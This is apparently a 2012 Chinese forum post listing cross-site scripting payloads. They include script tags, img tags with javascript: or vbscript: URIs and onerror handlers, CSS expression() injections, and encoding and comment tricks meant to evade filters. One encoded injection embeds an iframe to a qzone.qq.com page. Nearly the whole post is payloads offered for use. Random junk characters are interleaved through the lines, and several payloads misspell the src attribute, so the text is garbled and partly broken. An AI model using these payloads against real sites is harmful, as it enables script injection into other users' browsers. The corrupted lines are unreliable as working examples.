<script>alert("跨站")</script> (最常用); @; V2 F; w% s& S8 D/ k W: m, b
<img scr=javascript:alert("跨站")></img> ~. y9 }& z! x! o8 |
<img scr="javascript: alert(/跨站/)></img>
2 O1 J \# b; `<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
5 }$ @: |9 ]7 a s<img scr="#" onerror=alert(/跨站/)></img>
$ A0 N* N6 D6 d! G, ~, ^<img scr="#" style="xss:expression(alert(/xss/));"></img>
3 Y9 \" L4 M. ~9 e<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
& ^0 ? @) N: H4 ~& h<img src=vbscript:msgbox ("xss")></img>, }8 _' L5 J+ M6 z3 g
<style> input {left:expression (alert('xss'))}</style>+ Q, N) b" @7 a
<div style={left:expression (alert('xss'))}></div>3 i0 [' G6 T" \3 L
<div style={left:exp/* */ression (alert('xss'))}></div>
' ?* }& ~: f: W8 T# c6 S$ k<div style={left:\0065\0078ression (alert('xss'))}></div>" V/ p4 k, ?5 i3 M6 t
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>" `9 h6 j6 n2 J9 M' h8 p
unicode <div style="{left:expRessioN (alert('xss'))}">' S) T' } T6 ], ^; i6 N7 B1 O
+ W0 {+ Q; @& o+ F! }) ]
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
; h3 m q7 T1 Z% A" L |
发表于 2012-9-13 17:15:04
收藏
支持
反对